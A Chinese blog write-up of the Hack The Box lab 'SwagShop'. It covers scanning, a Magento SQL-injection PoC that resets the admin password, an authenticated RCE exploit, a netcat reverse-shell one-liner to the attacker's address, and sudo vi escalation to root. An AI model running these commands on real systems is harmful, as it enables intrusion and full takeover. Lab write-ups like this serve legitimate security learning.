• 【Hack The Box】linux练习-- SwagShop

    HTB 学习笔记

    Hack The Box】linux练习-- SwagShop

    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年11月17日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    文章目录

    在这里插入图片描述

    信息收集

    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9

    80

    需要添加hosts,在url显现出了
    在这里插入图片描述gedit /etc/hosts
    在这里插入图片描述
    而后我们发现这是一个购物网站
    具体功能点没有发现有什么
    在这里插入图片描述搜索一下开源cms
    在这里插入图片描述我想知道版本信息

    在这里插入图片描述看到一个应该是插件的更新日志吧
    先放着

    THIS IS A METAPACKAGE FOR UPGRADE FROM 0.9 TO 1.0

    Mage_Core_Modules

    • Mage_Core_Adminhtml
    • Interface_Adminhtml_Default
    • Interface_Frontend_Default
    • Interface_Install_Default
    gobuster dir -u http://swagshop.htb/index.php/ -x php -w /usr/share/dirb/wordlists/common.txt

    • 1

    可以深度扫描
    也可以习惯性的访问一下admin页面,果然有
    但是弱口令无效

    在这里插入图片描述因为网站底部显示这个是2014年,于是我去搜历史版本发布时间
    在这里插入图片描述
    两个版本,一个是1.9一个是1.14
    在这里插入图片描述但是37811我们用不了,他需要认证,需要我们提供用户账号密码
    于是我找到了一个exp
    如下,可以直接修改后台账号密码

    https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

    • 1

    在这里插入图片描述后台账号密码已经成功修改
    在这里插入图片描述

    现在我已经拿到了登陆凭据,我可以利用刚才的那个exp了

    按照如下利用

    python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""

    • 1

    但是我们在这之前还要先去修改一下py

    在这里插入图片描述这个是我们刚才目录扫描扫出来的
    时间戳按照提示去找即可

    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    python2 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

    • 1

    在这里插入图片描述
    在这里插入图片描述是的,我也不知道这个错误的产生以及如何解决,但我知道“如果解决不了问题,那就解决产生问题的人”

    直接把报错的那一行删掉
    在这里插入图片描述

    python2 37811.py 'http://swagshop.htb/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f"

    • 1
    python -c 'import pty;pty.spawn("/bin/bash")'. python3也有效。
Ctrl-z 到后台 shell。 在本地提示下, stty raw -echo.
fg将外壳带回前面。
reset重新初始化终端。 如果提示输入终端类型,请输入 screen.
在重置外壳中, export TERM=screen.

    • 1
    • 2
    • 3
    • 4
    • 5
    www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    sudo /usr/bin/vi /var/www/html/…/…/…/root/root.txt

    二进制提权

    sudo vi /var/www/html/a -c ':!/bin/sh'
或者
sudo vi -c ':!/bin/sh' /dev/null

    • 1
    • 2
    • 3
  • 相关阅读:
    信息学奥赛一本通:1409:判决素数个数
    计算机毕业设计微信小程序地摊租赁管理平台
    【Proteus仿真】【Arduino单片机】简易计算器设计
    MySQL批量入库的几种方式详解
    Pytorch:张量的梯度计算
    外包干了5天,技术明显退步。。。。。
    Python学习:魔法函数
    linux排查IO占用率高
    新加坡科技巨头Sea亏损小于预期,外资“清算”阿里只为加大赌注
    Apache Commons Pool2 池化技术
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127931895